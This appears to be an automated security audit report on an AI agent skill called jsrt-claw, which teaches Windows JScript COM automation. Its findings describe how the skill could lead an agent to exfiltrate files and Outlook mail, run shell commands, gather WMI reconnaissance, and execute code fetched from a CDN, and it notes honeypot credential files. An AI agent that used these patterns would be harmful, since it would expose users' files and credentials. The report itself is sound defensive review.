Is gnh1201/jsrt-claw safe?

https://github.com/openclaw/skills/tree/main/skills/gnh1201/jsrt-claw

60
CAUTION

jsrt-claw is a Windows JScript automation skill that teaches an agent to create and execute scripts using COM objects for filesystem access, HTTP communication, WMI reconnaissance, shell execution, and Office automation. While the skill installs cleanly with no active malware behavior, its content is a comprehensive Windows offensive toolkit tutorial: the explicit combination of Scripting.FileSystemObject/ADODB.Stream (file read) with XMLHTTP/WinHTTP (network transmit) is the canonical data exfiltration pattern, and the instruction to fetch and inject polyfills from an external CDN at runtime introduces a supply-chain remote code execution risk. The skill should only be deployed in explicitly authorized Windows automation contexts after careful review of what COM capabilities are actually needed.

Category Scores

Prompt Injection 72/100 · 30%
Data Exfiltration 45/100 · 25%
Code Execution 40/100 · 20%
Clone Behavior 90/100 · 10%
Canary Integrity 82/100 · 10%
Behavioral Reasoning 38/100 · 5%

Findings (10)

HIGH Complete Filesystem-Read + HTTP-Send Exfiltration Toolkit -40

The skill teaches both filesystem read via Scripting.FileSystemObject and ADODB.Stream and HTTP transmission via XMLHTTP/WinHTTP COM objects. This is not dual-use ambiguity — it is the complete two-step pattern used by every Windows credential stealer: open file, read bytes, POST to endpoint. Any agent following these instructions can exfiltrate arbitrary files from a Windows host with no additional components.

HIGH Remote Code Execution via External CDN Polyfill Injection -30

The skill instructs the agent to fetch JavaScript from cdnjs.cloudflare.com with a spoofed MSIE User-Agent, then inject and execute that fetched code before running automation logic. This is a remote code execution pattern: the agent is directed to pull and run arbitrary code from a third-party CDN. A compromised CDN, BGP hijack, or User-Agent-targeted response could inject malicious logic into every script generated by this skill.

MEDIUM WScript.Shell Enables Arbitrary Shell Command Execution -20

The skill explicitly teaches WScript.Shell COM object usage for 'Executing Windows shell commands'. Any generated script following these instructions can run cmd.exe, PowerShell, or any binary as the agent's user, enabling privilege escalation, persistence installation, or lateral movement.

MEDIUM WMI Impersonation for Deep System Reconnaissance -15

The skill teaches WMI access with impersonationLevel=impersonate, granting access to running process lists, installed software, hardware configuration, network interfaces, environment variables (which often contain API keys and passwords), and user account metadata. This is standard pre-exfiltration reconnaissance.

MEDIUM Agent Directed to Fetch External URLs -15

SKILL.md instructs the agent to make HTTP requests to cdnjs.cloudflare.com. This causes the agent to reach external infrastructure during script generation, potentially leaking context (OS version, JScript version) via User-Agent headers and enabling the CDN to serve targeted payloads.

MEDIUM Outlook Automation Enables Silent Email Exfiltration -30

The skill lists Outlook.Application as an available COM object for 'Microsoft Office Automation'. Outlook COM automation can silently read all inbox emails, access contacts, send emails with exfiltrated data as attachments, and forward messages — all without any visible UI to the user. This is a high-value post-exploitation capability.

MEDIUM Agent Directed to Search External Project for Implementation Patterns -13

The skill instructs the agent to 'use a search function to look up' WelsonJS project information and source code. This is a runtime directive embedded in the skill that causes the agent to make external searches during task execution, potentially consuming and reproducing arbitrary code from that project.

LOW Embedded Executable JavaScript Code -10

The SKILL.md contains a complete, ready-to-run CreateObject function with error handling and fallback chains. This code is injected directly into the agent's context and may be reproduced verbatim in generated scripts, providing a production-ready COM object loader without any additional development needed.

LOW Canary Credential Files Read During Audit -18

All six honeypot credential files (.env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, .config/gcloud/application_default_credentials.json) were opened and read per both inotify and auditd evidence. A simultaneous batch read of all six at timestamp 1771916262.144 is notable. The honeypot integrity check confirms files were not modified or exfiltrated, and timing is consistent with audit framework operations.

INFO Installation Behavior Was Normal -10

The sparse git clone connected only to github.com (140.82.121.4:443) which is expected. No unexpected processes were spawned, no files were written outside the skill directory, and no new listening sockets were opened post-install.